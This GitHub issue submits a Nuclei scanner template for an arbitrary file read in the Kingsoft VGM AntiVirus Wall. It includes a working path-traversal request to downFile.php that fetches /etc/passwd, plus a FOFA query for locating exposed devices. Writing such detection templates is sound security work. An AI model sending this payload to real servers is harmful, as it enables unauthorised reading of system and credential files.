### ISSUE TITLE
Kingsoft VGM AntiVirus Wall any file read

### ISSUE THREAD

**Issue by aheybati** [projectdiscovery/nuclei-templates#8391]
### Nuclei Template:
```yaml
id: Kingsoft-VGM-AntiVirus-Wall-any-file-read
info:
  name: Kingsoft Antivirus Arbitrary File Reading Vulnerability
  author: abbas.heybati
  severity: high
  description:  There is an arbitrary file reading vulnerability in Kingsoft Antivirus. An attacker can obtain any file on the server through the vulnerability.
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzkyMjE3MjEyNQ==&mid=2247486073&idx=1&sn=8e61e162262585bb8ce973b61df989b4&chksm=c1f925cbf68eacddfe441b8f1861e88068039712e467fb9bbe91eae31d439286c7147d197b07
  metadata:
    fofa-query: 'fofa: title="金山VGM防毒墙"'
  tags: Kingsoft-VGM,cve,read,file
requests:
  - method: GET
    path:
      - "{{BaseURL}}/downFile.php?filename=../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
```
